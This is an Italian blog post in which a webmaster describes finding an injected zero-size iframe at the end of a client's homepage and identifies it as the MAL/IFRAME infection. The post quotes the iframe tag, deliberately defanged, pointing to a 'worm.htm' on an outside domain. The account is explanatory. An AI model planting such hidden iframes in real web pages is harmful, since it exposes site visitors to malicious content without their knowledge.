virus html iframe
Qualche giorno fa ho aggiornato la home page di un cliente, pubblico e mi vedo una pagina con questo titolo: Server Apache installato ... e un testo che spiega che "ora puoi configurare il sito", peccato che si trattava di una banale pagina html.
Dopo qualche minuto di smarrimento provo a spostare il sito su un altro dominio (casomai è impazzito l'hosting del cliente) ... stessa pagina.
Allora provo a rimettere su la vecchia home page, e il sito come per magia torna visibile. Confronto i due html e mi accorgo che in coda alla pagina c'è questo IFRAME (che scriverò scoretto per non farlo attivare):
iframe src=htp:/www.krvkr.com/ worm. htm" width="0" height="0">/iframe>
che mi apriva questo sito: www.gcafe.com
che io non ho messo. il funzionamento è semoplice, l'iframe si carica a tutta pagina, nascondendo la mia e facendo vedere il sito con la inta pagina di Apache.
Faccio un giro su internet e scopro che il virus si chiama MAL/IFRAME, pare che attacchi tutti i files HTML del PC. In realtà mi ha attaccato solo quello, qui una serie di links per capirne di piu.
http://www.webmasterworld.com/webmaster/3259869.htm
http://www.sophos.com/security/analyses/viruses-and-spyware/maliframef.html
Etichette: html